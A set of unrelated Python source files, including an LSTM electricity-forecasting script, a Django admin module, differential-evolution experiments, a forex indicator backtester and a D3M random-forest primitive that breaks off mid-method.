def sequentialize(scaled_inputData, inputData_index, window_size=None, to_ndarray=False):
if window_size is None:
print("\n", "please use 'window_size'...!")
return(None)
elif isinstance(window_size, int):
# change type to use 'shift' of pd.DataFrame
scaled_inputData = pd.DataFrame(scaled_inputData, columns=["value"], index=inputData_index)
# dataframe which is shifted as many as window size
for idx in range(1,window_size+1):
scaled_inputData["before_{}".format(idx)] = scaled_inputData["value"].shift(idx)
# drop na
inputSequence = scaled_inputData.dropna().drop('value', axis=1)
output = scaled_inputData.dropna()[['value']]
if to_ndarray is False:
return(inputSequence, output)
else:
inputSequence = inputSequence.values
output = output.values
return(inputSequence, output)
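# Tiny illustration of sequentialize with made-up data (not part of the original pipeline):
# a window_size of 3 turns a 6-point series into 3 rows of lagged inputs and 3 aligned targets.
_demo_index = pd.date_range('2020-01-01', periods=6, freq='H')
_demo_X, _demo_y = sequentialize(np.arange(6, dtype=float).reshape(-1, 1), _demo_index,
                                 window_size=3, to_ndarray=True)
assert _demo_X.shape == (3, 3) and _demo_y.shape == (3, 1)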
### training with different params sets (epochs + batch size). and save error scores.
### We can choose smallest error score params set to apply to model
def optimizing(X_train, y_train,X_test, y_test, epochs, batch_size):
error_scores = pd.DataFrame(columns=['epochs','batch_size','RMSE'])
for e in epochs:
for b in batch_size:
# --- train LSTM network --- #
# todo: what "K.clear_session()" do...?
K.clear_session()
model = Sequential()
model.add(LSTM(units=20, input_shape=(12, 1))) # (timestep, feature)
model.add(Dense(units=1)) # output = 1
model.compile(loss="mean_squared_error", optimizer="adam")
model.summary()
# todo: inspect "EarlyStopping function()"
early_stop = EarlyStopping(monitor="loss", patience=1, verbose=1)
# todo: make loss list & accumulate loss value to loss list
# todo: & plot lost list
model.fit(X_train, y_train, epochs=e, batch_size=b, verbose=2, callbacks=[early_stop])
# todo: check 'why full iteration is stopped'
# --- predict LSTM network --- #
# todo: fix codes below...!
trainPred = model.predict(X_train)
trainPred = scaler.inverse_transform(trainPred)
trainY = scaler.inverse_transform(y_train)
testPred = model.predict(X_test)
testPred = scaler.inverse_transform(testPred)
testY = scaler.inverse_transform(y_test)
# --- MSE --- #
trainScore = math.sqrt(mean_squared_error(trainY, trainPred))
testScore = math.sqrt(mean_squared_error(testY, testPred))
print("\n", "Train Score: %.1f RMSE" % (trainScore), "\n", " Test Score: %.1f RMSE" % (testScore))
error_scores = error_scores.append([{'epochs':e,'batch_size':b,'RMSE':testScore}], ignore_index=True)
return error_scores
#######################################
#### MAIN########################
################################
link = 'paldal_ward_field.csv'
data = loadData(link)
### resample data to hour frequence (to reduce data length)
data1 = data.resample('15min').mean().reindex(pd.date_range(data.index[0],data.index[-1],freq='H'))
## fill missing data with mean value
data1 = data1.fillna(data1['Power'].mean())
# --- split data1 to "train/test" --- #
train_data, test_data = splitData(data=data1, trainPercent=0.7, split_by_time=False)
# --- scaling --- #
train_data_sc, scaler = scale_to_0and1(train_data)
test_data_sc = scaler.transform(test_data)
# --- create data1set with window size --- #
inputTrain, ouputTrain = \
sequentialize(train_data_sc, train_data.index, window_size=168, to_ndarray=True)
inputTest, ouputTest = \
sequentialize(test_data_sc, test_data.index, window_size=168, to_ndarray=True)
# # --- create data1 matrix ---#
# # todo: understand "create_data1set" function
# trainX, trainY = create_data1set(train_data1, look_back=1)
# testX, testY = create_data1set(test_data1, look_back=1)
# --- change input (X) format for LSTM (reshape)--- #
### only with input data, output does not require reshape
inputTrain = reshapeForLSTM(inputTrain, time_steps=168)
inputTest = reshapeForLSTM(inputTest, time_steps=168)
# ###########tuning paramters
# epochs = [500, 1000, 1500, 2000, 2500, 3000]
# batch_size = [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000]
# error_scores = optimizing(X_train, y_train, X_test, y_test,epochs,batch_size)
# print(min(error_scores['RMSE']))
########### --- train LSTM network --- #
# todo: what "K.clear_session()" do...?
K.clear_session()
model = Sequential()
model.add(LSTM(units=200, input_shape=(168, 1))) # (timestep, feature)
model.add(Dense(units=1)) # output = 1
model.compile(loss="mean_squared_error", optimizer="adam")
model.summary()
# todo: inspect "EarlyStopping function()"
early_stop = EarlyStopping(monitor="loss", patience=5, verbose=1)
model.fit(inputTrain, ouputTrain, epochs=200, batch_size=168, verbose=2, callbacks=[early_stop])
###load model from file
model.save('LSTM_keras_BatchSize_168_HiddenSize_200.h5') ## save checkpoint
from keras.models import load_model
model = load_model('LSTM_keras_BatchSize_168_HiddenSize_200.h5') ### load checkpoint
# --- predict LSTM network --- #
# todo: fix codes below...!
trainPred = model.predict(inputTrain)
trainPred = scaler.inverse_transform(trainPred)
trainY = scaler.inverse_transform(ouputTrain)
testPred = model.predict(inputTest)
testPred = scaler.inverse_transform(testPred)
testY = scaler.inverse_transform(ouputTest)
# --- MSE --- #
trainScore = math.sqrt(mean_squared_error(trainY, trainPred))
testScore = math.sqrt(mean_squared_error(testY, testPred))
print("\n",
"Train Score: %.1f RMSE" % (trainScore), "\n",
" Test Score: %.1f RMSE" % (testScore))
### create a list to hold predicted values
forecastArray = []
### define forecast length
forecastLength = 240 ## 10 days
#### initialize input window
window = train_data_sc
for i in range(forecastLength):
#### sequentializing input data
inputTrain, outputTrain = sequentialize(window, data1.index[:len(window)], window_size=168,to_ndarray=True)
#### reshape input due to LSTM requirement
inputTrain = reshapeForLSTM(inputTrain, time_steps=168)
## predict output
predictedSequence = model.predict(inputTrain)
### reshape input data and put the last predicted value into
m = np.reshape(window, [len(window)])
m = np.append(m, predictedSequence[-1,0])
### also, put last predicted value into list
forecastArray.append(predictedSequence[-1,0])
print('Step: {} - predicted: {}'.format(i,predictedSequence[-1, 0]))
#### reshape input data for sequentializing
window = np.reshape(m, [len(m), 1])
###temporally saving predicted values (because it's take time to run prediction)
forecastIndex = data1.index[len(train_data):len(train_data)+forecastLength]
### convert forecast value into dataframe
df = pd.DataFrame(forecastArray)
df = scaler.inverse_transform(df)
### add index to forecasted data
df = pd.DataFrame(df, index=forecastIndex)
df.to_csv('PredictedPower_240Hour.csv')
#### plotting
plt.plot(df, label='Predicted')
plt.plot(test_data, label='Real')
plt.legend()
plt.show()
plt.close('all')
|
import models
from django.contrib import admin
from django.contrib.auth.models import User
class CategoryAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug": ("title",)}
class CategoryToPostInline(admin.TabularInline):
model = models.CategoryToPost
extra = 1
class PostAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug": ("title",)}
exclude = ('author',)
inlines = [CategoryToPostInline]
def save_model(self, request, obj, form, change):
obj.author = request.user
obj.save()
admin.site.register(models.Post, PostAdmin)
admin.site.register(models.Category, CategoryAdmin)
|
image_height = 594
image_width = 742
resized_image_size = 255
|
import numpy as np
import pandas as pd
from tqdm import tqdm
from src import bbde
from src.experiment_helpers.single_algorithm_stats import calculate_average_results, calculate_average_de_results
def run_experiments_for_cost_function(cost_function, cost_function_name, iterations, bounds, dimensions=10):
populations = [20, 40, 60, 80, 100, 120]
all_de_results = pd.DataFrame()
all_bbde_results = pd.DataFrame()
for popsize in tqdm(populations, leave=False, desc='populations'):
normalized_population, denorm_population = initialize_population(popsize, bounds * dimensions)
cross_probs = [0, 0.5]
for cross_probability in tqdm(cross_probs, leave=False, desc='cross probs'):
bin_de_results = calculate_average_de_results(
mutation=0.7,
xlabel='Iteracje',
ylabel='Wartość funkcji kosztu',
figname=f'de-{cost_function_name}-bin-{int(cross_probability*10)}-{popsize}.png',
normalized_population=normalized_population.copy(),
denorm_population=denorm_population.copy(),
cost_function=cost_function,
population_size=popsize,
cross_probability=cross_probability,
bounds=bounds * dimensions,
samples=25,
exp=False
)
all_de_results[f'bin{popsize}-{int(cross_probability * 10)}'] = bin_de_results['mean']
exp_de_results = calculate_average_de_results(
mutation=0.7,
xlabel='Iteracje',
ylabel='Wartość funkcji kosztu',
figname=f'de-{cost_function_name}-exp-{popsize}.png',
normalized_population=normalized_population.copy(),
denorm_population=denorm_population.copy(),
cost_function=cost_function,
population_size=popsize,
cross_probability=0.0,
bounds=bounds * dimensions,
samples=25,
exp=True
)
all_de_results[f'exp{popsize}'] = exp_de_results['mean']
bbde_results = calculate_average_results(
bbde.bbde,
xlabel='Iteracje',
ylabel='Wartość funkcji kosztu',
figname=f'bbde-{cost_function_name}-alt-{popsize}.png',
fobj=cost_function,
samples=25,
its=iterations,
pop=denorm_population.copy(),
alternative_exp_offset=True,
)
all_bbde_results[f'alt{popsize}'] = bbde_results['mean']
bbde_results = calculate_average_results(
bbde.bbde,
xlabel='Iteracje',
ylabel='Wartość funkcji kosztu',
figname=f'bbde-{cost_function_name}-nor-{popsize}.png',
fobj=cost_function,
samples=25,
its=iterations,
pop=denorm_population.copy(),
alternative_exp_offset=False,
)
all_bbde_results[f'nor{popsize}'] = bbde_results['mean']
return all_de_results, all_bbde_results
def initialize_population(population_size, bounds):
dimensions = len(bounds)
normalized_population = np.random.rand(population_size, dimensions)
# check if bounds are given in proper order
min_bound, max_bound = np.asarray(bounds).T
bounds_difference = np.fabs(min_bound - max_bound)
denorm_population = max_bound - bounds_difference * normalized_population
return normalized_population, denorm_population
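# A small shape-check sketch (illustrative values only, separate from the experiments above):
if __name__ == '__main__':
    norm_pop, denorm_pop = initialize_population(population_size=4, bounds=[(-5.0, 5.0)] * 2)
    # Both arrays are (population_size, dimensions); denorm_pop lies inside the given bounds.
    print(norm_pop.shape, denorm_pop.min(), denorm_pop.max())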
|
# -- ------------------------------------------------------------------------------------ -- #
# -- project: Market Microstructure and Trading Systems - Final Project - Trading System
# -- file: proceso.py - data-processing functions
# -- maintainers: IF Hermela Peña, IF Manuel Pintado
# -- repository: https://github.com/manuelpintado/Proyecto_Equipo_6.git
# -- ------------------------------------------------------------------------------------ -- #
# Import libraries
import datos
import funciones as fn
from statsmodels.tsa.seasonal import seasonal_decompose
from statsmodels.tsa.stattools import adfuller
from statsmodels.stats.diagnostic import het_arch
from scipy.stats import shapiro
import numpy as np
import pandas as pd
# -- ----------------------------------------- FUNCTION: Augmented Dickey-Fuller -- #
# -- Test whether the series is stationary
def f_a_dicky_fuller(df_indicador):
"""
:param df_indicador: dataframe de serie de tiempo indicador
:return: pueba dick fuller aumentada e impresion de parametros hasta rechazar H0. nivelde confianza 95%
Debugging
--------
df_indicador = datos.f_leer_archivo(file_path='datos/Unemployment Rate - United States.csv')
"""
serie = df_indicador
a_dicky_fuller = adfuller(serie.Actual)
print('ADF Statistic: %f' % a_dicky_fuller[0])
print('p-value: %f' % a_dicky_fuller[1])
print('Critical Values:')
for key, value in a_dicky_fuller[4].items():
print('\t%s: %.3f' % (key, value))
i = 1
while a_dicky_fuller[1] > 0.05:
serie['Actual'] = serie['Actual'].diff()
serie.dropna(inplace=True)
a_dicky_fuller = adfuller(serie.Actual)
print('\n Transformada {}'.format(i))
print('ADF Statistic: %f' % a_dicky_fuller[0])
print('p-value: %f' % a_dicky_fuller[1])
print('Critical Values:')
for key, value in a_dicky_fuller[4].items():
print('\t%s: %.3f' % (key, value))
i += 1
serie.reset_index(inplace=True)
return a_dicky_fuller
# -- ----------------------------------------- FUNCTION: Normality -- #
# -- Test whether the series is normally distributed
def f_normalidad(df_indicador):
"""
:param df_indicador: dataframe de la serie de tiempo del indicador
:return: informacion de la prueba de shapiro (t-stat y p-value)
Debugging
--------
df_indicador = datos.f_leer_archivo(file_path='datos/Unemployment Rate - United States.csv')
"""
shapiro_results = shapiro(df_indicador.Actual)
print('Prueba de normalidad: \n'
' H0: La serie es normal \n'
' H1: La serie no es normal \n')
if shapiro_results[1] <= 0.05:
print('P-value: {}'.format(shapiro_results[1]))
print('Se rechaza la H0, la serie no es normal')
else:
print('P-value: {}'.format(shapiro_results[1]))
print('Se acepta la H0, la serie es normal')
return shapiro_results
# -- ----------------------------------------- FUNCTION: ARCH -- #
# -- Test for ARCH effects (conditional heteroscedasticity)
def f_heterocerasticidad(df_indicador):
"""
Parameters
----------
df_indicador
Returns
-------
"""
arch = het_arch(df_indicador['Actual'])
return arch
# -- ----------------------------------------- FUNCTION: Seasonality -- #
# -- Decompose the series to look for seasonality
def f_estacionalidad(df_indicador):
"""
:param df_indicador: datos del indicador que sean estacionarios
:return: descomposicion de la serie para ver estacionalidad
Debugging
--------
df_indicaros = df_indicador
"""
resultado = seasonal_decompose(df_indicador['Actual'], period=1)
return resultado
# -- --------------------------------------------------------- FUNCTION: Load and classify -- #
# -- Load the indicator history file and classify each occurrence
def f_clasificacion_ocurrencias(file_path: str, columns=None):
"""
:param file_path: lugar donde esta ubicado el archivo de los datos historicos del indicador
:param columns: columnas a tomar del archivo (opcional)
:return: dataframe del archivo agregando la clasificacion de cada ocurrencia
Debugging
--------
file_path = 'datos/Unemployment Rate - United States.csv'
"""
    # Load file information
    df_indicador = datos.f_leer_archivo(file_path=file_path, columns=columns)  # Indicator history
    # Check that every column is populated and fill in missing data
    df_indicador = datos.f_validar_info(df_indicador)
    # Assign a scenario condition to each row
df_indicador['escenario'] = [fn.condition(row['Actual'], row['Consensus'], row['Previous'])
for index, row in df_indicador.iterrows()]
return df_indicador
# -- --------------------------------------------------------- FUNCTION: Metrics -- #
# -- Compute direction, pips and volatility for each 30-minute window after the indicator
def f_metricas(df_indicador, load_file: bool = False):
"""
:param df_indicador: data frame con los datos de cuando se reporto el indicador y las columnas
- Actual
- Consensus
- Previous
:param load_file: Cargar un archivo con los datos historicos
:return: mismo dataframe con las sigueintes metricas
- Direccion: 1 = alcista, -1 = bajista
- Pips_alcistas: cantidad de pips que subio la ventana
- Pips_bajistas: cantidad de pips que bajo la ventana
- volatilidad diferencia entre maximo y minimo de la ventana
Debugging
--------
df_indicador = datos.f_leer_archivo(file_path='datos/Unemployment Rate - United States.csv')
"""
    # get the dictionary of 30-minute windows following each indicator release
    if load_file:
        dict_historicos = datos.load_pickle_file('datos/ventanas_historicos.pkl')
    else:
        dict_historicos = datos.f_ventanas_30_min(df=df_indicador)
    # Add the metric columns to the dataframe
    df_indicador['direccion'] = 0
    df_indicador['pips_alcistas'] = 0
    df_indicador['pips_bajistas'] = 0
    df_indicador['volatilidad'] = 0
    # Initialize counter
    i = 0
    # Loop to compute the basic metrics
    for df in dict_historicos['historicos_sucesos'].values():
        # window direction
        if df.Close.iloc[-1] - df.Open.iloc[0] >= 0:
            df_indicador.loc[i, 'direccion'] = 1  # 1 = bullish
        else:
            df_indicador.loc[i, 'direccion'] = -1  # -1 = bearish
        # pips up / down
        df_indicador.loc[i, 'pips_alcistas'] = (df.High.max() - df.Open[0]) * 10000
        df_indicador.loc[i, 'pips_bajistas'] = (df.Open[0] - df.Low.min()) * 10000
        # window volatility
        df_indicador.loc[i, 'volatilidad'] = df.High.max() - df.Low.min()
        # counter
        i += 1
return df_indicador
# -- --------------------------------------------------------- FUNCTION: Backtest -- #
# -- Run a backtest on the historical data
def f_backtest(df_decisiones, df_hist, inversion_inicial: float):
"""
:param df_decisiones: dataframe de las decisiones para cada tipo de escenario del indicador (A,B,C,D)
:param df_hist: dataframe de cuando se emitio el indicador y que tipo de escenario es
:param inversion_inicial: monto inicial de la cuenta
:return: dataframe con el backtest para todos los escenarios del indicador
Debugging
--------
df_decisiones = df_decisiones
df_hist = train
inversion_inicial = 100000
"""
    dict_ventanas = datos.load_pickle_file('datos/ventanas_historicos.pkl')['historicos_sucesos']  # Load windows
    df_bt = df_hist.loc[:, ('DateTime', 'escenario')]  # Extract the needed columns from the history
    df_bt = df_bt.merge(df_decisiones.loc[:, ('escenario', 'operacion', 'volumen')], how='left', on='escenario')
    df_bt = df_bt.reindex(columns=df_bt.columns.tolist() + ['resultado', 'pips'])  # add the result columns
    # walk through the windows
for i in df_bt.index:
        ventana = dict_ventanas[str(df_bt['DateTime'][i])]  # Pick the window to review
tp_sl = df_decisiones.loc[df_decisiones['escenario'] == df_bt['escenario'][i], ('tp', 'sl')]
if df_bt['operacion'][i] == 'buy':
for j in ventana.index:
if ventana.High[j] >= (ventana.Open[0] + tp_sl.iloc[0, 0] / 10000):
df_bt.loc[i, 'resultado'] = 'ganada'
df_bt.loc[i, 'pips'] = tp_sl.iloc[0, 0]
break
elif ventana.Low[j] <= (ventana.Open[0] - tp_sl.iloc[0, 1] / 10000):
df_bt.loc[i, 'resultado'] = 'perdida'
df_bt.loc[i, 'pips'] = -tp_sl.iloc[0, 1]
break
elif j == ventana.index[-1]:
df_bt.loc[i, 'resultado'] = 'ganada' if ventana.Close[j] >= ventana.Open[0] else 'perdida'
df_bt.loc[i, 'pips'] = (ventana.Close[j] - ventana.Open[0]) * 10000
        else:  # sell operation
for j in ventana.index:
if ventana.Low[j] <= (ventana.Open[0] - tp_sl.iloc[0, 0] / 10000):
df_bt.loc[i, 'resultado'] = 'ganada'
df_bt.loc[i, 'pips'] = tp_sl.iloc[0, 0]
break
elif ventana.High[j] >= (ventana.Open[0] + tp_sl.iloc[0, 1] / 10000):
df_bt.loc[i, 'resultado'] = 'perdida'
df_bt.loc[i, 'pips'] = -tp_sl.iloc[0, 1]
break
elif j == ventana.index[-1]:
df_bt.loc[i, 'resultado'] = 'ganada' if ventana.Close[j] <= ventana.Open[0] else 'perdida'
df_bt.loc[i, 'pips'] = (ventana.Open[0] - ventana.Close[j]) * 10000
df_bt['capital'] = [df_bt['pips'][i] / 10000 * df_bt['volumen'][i] for i in df_bt.index]
df_bt['capital_acm'] = df_bt['capital'].cumsum() + inversion_inicial
return df_bt
def f_backtest_2(decisiones, df_hist, inversion_inicial: float):
"""
:param df_decisiones: dataframe de las decisiones para cada tipo de escenario del indicador (A,B,C,D)
:param df_hist: dataframe de cuando se emitio el indicador y que tipo de escenario es
:param inversion_inicial: monto inicial de la cuenta
:return: dataframe con el backtest para todos los escenarios del indicador
Debugging
--------
decisiones = np.array([100,200,100000,100,200,100000,100,200,100000,100,200,100000])
df_hist = train
inversion_inicial = 100000
"""
    dict_ventanas = datos.load_pickle_file('datos/ventanas_historicos.pkl')['historicos_sucesos']  # Load windows
dates = np.array(df_hist['DateTime'])
escenario = np.array(df_hist['escenario'])
resultado = np.empty(len(dates), dtype='object')
pips = np.empty(len(dates))
operacion = np.empty(len(dates), dtype='object')
volumen = np.empty(len(dates))
    # walk through the windows
    for i in range(len(dates)):
        ventana = dict_ventanas[str(pd.to_datetime(dates[i]))]  # Pick the window to review
open = np.array(ventana.Open)
high = np.array(ventana.High)
low = np.array(ventana.Low)
close = np.array(ventana.Close)
if escenario[i] == 'A':
sl_tp = np.array([decisiones[0], decisiones[1]])
volumen[i] = decisiones[2]
operacion[i] = 'venta'
elif escenario[i] == 'B':
sl_tp = np.array([decisiones[3], decisiones[4]])
volumen[i] = decisiones[5]
operacion[i] = 'compra'
elif escenario[i] == 'C':
sl_tp = np.array([decisiones[6], decisiones[7]])
volumen[i] = decisiones[8]
operacion[i] = 'venta'
else:
sl_tp = np.array([decisiones[9], decisiones[10]])
volumen[i] = decisiones[11]
operacion[i] = 'compra'
if operacion[i] == 'compra':
for j in range(len(open)):
if high[j] >= (open[0] + sl_tp[1] / 10000):
resultado[i] = 'ganada'
pips[i] = sl_tp[1]
break
elif low[j] <= (open[0] - sl_tp[0] / 10000):
resultado[i] = 'perdida'
pips[i] = -sl_tp[0]
break
elif j == len(open)-1:
resultado[i] = 'ganada' if close[j] >= open[0] else 'perdida'
pips[i] = (close[j] - open[0]) * 10000
        else:  # sell operation
for j in range(len(open)):
if low[j] <= (open[0] - sl_tp[1] / 10000):
resultado[i] = 'ganada'
pips[i] = sl_tp[1]
break
elif high[j] >= (open[0] + sl_tp[0] / 10000):
resultado[i] = 'perdida'
pips[i] = -sl_tp[0]
break
elif j == len(open)-1:
resultado[i] = 'ganada' if close[j] <= open[0] else 'perdida'
pips[i] = (open[0] - close[j]) * 10000
capital = np.array(pips / 10000 * volumen)
capital_acm = capital.cumsum() + inversion_inicial
df_bt = pd.DataFrame({'DateTime': pd.to_datetime(dates),
'escenario': escenario,
'operacion': operacion,
'volumen': volumen,
'resultado': resultado,
'pips': pips,
'capital': capital,
'capital_acm': capital_acm})
return df_bt
|
from modules import capitalize
print (capitalize("hello"))
|
#! /usr/bin/env python
import argparse
from open_site import open_site
def run(args):
open_site(args.input, args.openBrowser)
def main():
parser = argparse.ArgumentParser(
description="This interface can be used to search through the nature research journal for articles of interest"
)
parser.add_argument(
"--input",
nargs="+",
help="This argument excepts the url to nature journal search bar and then the desired search term.",
dest="input",
type=str,
required=True,
)
    parser.add_argument(
        "--openBrowser",
        help="If this flag is given, the web page will be opened in the browser",
        dest="openBrowser",
        action="store_true",
        required=False,
        default=False,
    )
parser.set_defaults(func=run)
args = parser.parse_args()
args.func(args)
if __name__ == "__main__":
main()
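# Example invocation (hypothetical script name, URL and search term, shown only to
# illustrate the flags; --openBrowser is a plain on/off switch):
#   python nature_search.py --input https://www.nature.com/search "machine learning" --openBrowser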
|
#
# Copyright © 2021 Uncharted Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from typing import List, Dict, Optional
import numpy as np
import pandas as pd
import shap
from sklearn.cluster import KMeans
from d3m import container, utils
from d3m.metadata import base as metadata_base, hyperparams, params
from d3m.primitive_interfaces import base
from d3m.primitive_interfaces.base import CallResult
from d3m.primitive_interfaces.supervised_learning import PrimitiveBase
from distil.modeling.forest import ForestCV
from distil.modeling.metrics import classification_metrics, regression_metrics
from distil.utils import CYTHON_DEP
import version
__all__ = ("EnsembleForest",)
logger = logging.getLogger(__name__)
class Hyperparams(hyperparams.Hyperparams):
metric = hyperparams.Enumeration[str](
values=classification_metrics + regression_metrics,
default="f1Macro",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="The D3M scoring metric to use during the fit phase. This can be any of the regression, classification or "
+ "clustering metrics.",
)
shap_max_dataset_size = hyperparams.Hyperparameter[int](
default=1500,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="The maximum dataset size on which to apply SHAP interpretation to each sample individually. Otherwise, this number of samples will be"
+ "drawn from the data distribution after clustering (to approximate the distribution) and interpretation will only be applied to these"
+ "samples",
)
n_estimators = hyperparams.UniformInt(
lower=1,
upper=2048,
default=32,
description="The number of trees in the forest.",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/TuningParameter",
"https://metadata.datadrivendiscovery.org/types/ResourcesUseParameter",
],
)
min_samples_leaf = hyperparams.UniformInt(
lower=1,
upper=31,
default=2,
description="Minimum number of samples to split leaf",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/TuningParameter",
"https://metadata.datadrivendiscovery.org/types/ResourcesUseParameter",
],
)
class_weight = hyperparams.Enumeration[str](
values=["None", "balanced", "balanced_subsample"],
default="None",
description="todo",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/TuningParameter"
],
)
estimator = hyperparams.Enumeration[str](
values=["ExtraTrees", "RandomForest"],
default="ExtraTrees",
description="todo",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/TuningParameter"
],
)
grid_search = hyperparams.Hyperparameter[bool](
default=False,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Runs an internal grid search to fit the primitive, ignoring caller supplied values for "
+ "n_estimators, min_samples_leaf, class_weight, estimator",
)
small_dataset_threshold = hyperparams.Hyperparameter[int](
default=2000,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="If grid_search is true, controls the application of the 'small_dataset_fits' and 'large_dataset_fits' "
+ "parameters - if the input dataset has fewer rows than the threshold value, 'small_dateset_fits' will be used when fitting. "
+ "Otherwise, 'num_large_fits' is used.",
)
small_dataset_fits = hyperparams.Hyperparameter[int](
default=5,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="If grid_search is true, the number of random forests to fit when using small datasets.",
)
large_dataset_fits = hyperparams.Hyperparameter[int](
default=1,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="If grid_search is true, the number of random forests to fit when using large datasets.",
)
compute_confidences = hyperparams.Hyperparameter[bool](
default=False,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Compute confidence values. Only valid when the task is classification.",
)
n_jobs = hyperparams.Hyperparameter[int](
default=64,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="The value of the n_jobs parameter for the joblib library",
)
pos_label = hyperparams.Hyperparameter[Optional[str]](
default=None,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Name of the positive label in the binary case. If none is provided, second column is assumed to be positive",
)
class Params(params.Params):
model: ForestCV
target_cols: List[str]
label_map: Dict[int, str]
needs_fit: bool
binary: bool
input_hash: pd.Series
class EnsembleForestPrimitive(
PrimitiveBase[container.DataFrame, container.DataFrame, Params, Hyperparams]
):
"""
Generates an ensemble of random forests, with the number of internal models created controlled by the size of the
input dataframe. It accepts a dataframe as input, and returns a dataframe consisting of prediction values only as output.
Columns with string structural types are ignored.
"""
metadata = metadata_base.PrimitiveMetadata(
{
"id": "e0ad06ce-b484-46b0-a478-c567e1ea7e02",
"version": version.__version__,
"name": "EnsembleForest",
"python_path": "d3m.primitives.learner.random_forest.DistilEnsembleForest",
"source": {
"name": "Distil",
"contact": "mailto:cbethune@uncharted.software",
"uris": [
"https://github.com/uncharted-distil/distil-primitives/blob/main/distil/primitives/ensemble_forest.py",
"https://github.com/uncharted-distil/distil-primitives",
],
},
"installation": [
CYTHON_DEP,
{
"type": metadata_base.PrimitiveInstallationType.PIP,
"package_uri": "git+https://github.com/uncharted-distil/distil-primitives.git@{git_commit}#egg=distil-primitives".format(
git_commit=utils.current_git_commit(os.path.dirname(__file__)),
),
},
],
"algorithm_types": [
metadata_base.PrimitiveAlgorithmType.RANDOM_FOREST,
],
"primitive_family": metadata_base.PrimitiveFamily.LEARNER,
},
)
def __init__(self, *, hyperparams: Hyperparams, random_seed: int = 0) -> None:
super().__init__(hyperparams=hyperparams, random_seed=random_seed)
# hack to get around typing constraints.
if self.hyperparams["class_weight"] == "None":
class_weight = None
else:
class_weight = self.hyperparams["class_weight"]
grid_search = self.hyperparams["grid_search"]
if grid_search is True:
current_hyperparams = None
else:
current_hyperparams = {
"estimator": self.hyperparams["estimator"],
"n_estimators": self.hyperparams[
"n_estimators"
], # [32, 64, 128, 256, 512, 1024, 2048],
"min_samples_leaf": self.hyperparams[
"min_samples_leaf"
], # '[1, 2, 4, 8, 16, 32],
}
if self.hyperparams["metric"] in classification_metrics:
current_hyperparams.update({"class_weight": class_weight})
else: # regression
current_hyperparams.update({"bootstrap": True})
self._model = ForestCV(
self.hyperparams["metric"],
random_seed=self.random_seed,
hyperparams=current_hyperparams,
grid_search=grid_search,
n_jobs=self.hyperparams["n_jobs"],
)
self._needs_fit = True
self._label_map: Dict[int, str] = {}
self._target_cols: List[str] = []
self._binary = False
def _get_component_columns(
self, output_df: container.DataFrame, source_col_index: int
) -> List[int]:
# Component columns are all column which have as source the referenced
# column index. This includes the aforementioned column index.
component_cols = [source_col_index]
# get the column name
col_name = output_df.metadata.query(
(metadata_base.ALL_ELEMENTS, source_col_index)
)["name"]
# get all columns which have this column as source
for c in range(0, len(output_df.columns)):
src = output_df.metadata.query((metadata_base.ALL_ELEMENTS, c))
if "source_column" in src and src["source_column"] == col_name:
component_cols.append(c)
return component_cols
def set_training_data(
self, *, inputs: container.DataFrame, outputs: container.DataFrame
) -> None:
# At this point anything that needed to be imputed should have been, so we'll
# clear out any remaining NaN values as a last measure.
# if we are doing classification the outputs need to be integer classes.
        # label map is used to convert these back on produce.
col = outputs.columns[0]
if self._model.mode == "classification":
factor = pd.factorize(outputs[col])
outputs = pd.DataFrame(factor[0], columns=[col])
self._label_map = {k: v for k, v in enumerate(factor[1])}
self._target_cols = list(outputs.columns)
# remove nans from outputs, apply changes to inputs as well to ensure alignment
self._input_hash = pd.util.hash_pandas_object(inputs)
self._outputs = outputs[
outputs[col] != ""
].dropna() # not in place because we don't want to modify passed input
self._binary = self._outputs.iloc[:, 0].nunique(dropna=True) <= 2
row_diff = outputs.shape[0] - self._outputs.shape[0]
if row_diff != 0:
logger.warn(f"Removed {row_diff} rows due to NaN values in target data.")
self._inputs = inputs.loc[self._outputs.index, :]
else:
self._inputs = inputs
# same in other direction
inputs_rows = self._inputs.shape[0]
inputs_cols = self._inputs.shape[1]
self._inputs = self._inputs.select_dtypes(include="number")
col_diff = inputs_cols - self._inputs.shape[1]
if col_diff != 0:
logger.warn(f"Removed {col_diff} unencoded columns from training data.")
self._inputs = (
self._inputs.dropna()
        )  # not in place because selection above doesn't create a copy
row_diff = inputs_rows - self._inputs.shape[0]
if row_diff != 0:
logger.warn(f"Removed {row_diff} rows due to NaN values in training data.")
self._outputs = self._outputs.loc[self._inputs.index, :]
self._model.num_fits = (
self.hyperparams["large_dataset_fits"]
if self._inputs.shape[0] > self.hyperparams["small_dataset_threshold"]
else self.hyperparams["small_dataset_fits"]
)
self._needs_fit = True
def fit(self, *, timeout: float = None, iterations: int = None) -> CallResult[None]:
logger.debug(f"Fitting {__name__}")
if self._needs_fit:
self._model.fit(self._inputs.values, self._outputs.values)
self._needs_fit = False
return CallResult(None)
def produce(
self,
*,
inputs: container.DataFrame,
timeout: float = None,
iterations: int = None,
) -> CallResult[container.DataFrame]:
logger.debug(f"Producing {__name__}")
        # force a fit if it hasn't yet been done
if self._needs_fit:
self.fit()
        # drop any non-numeric columns
num_cols = inputs.shape[1]
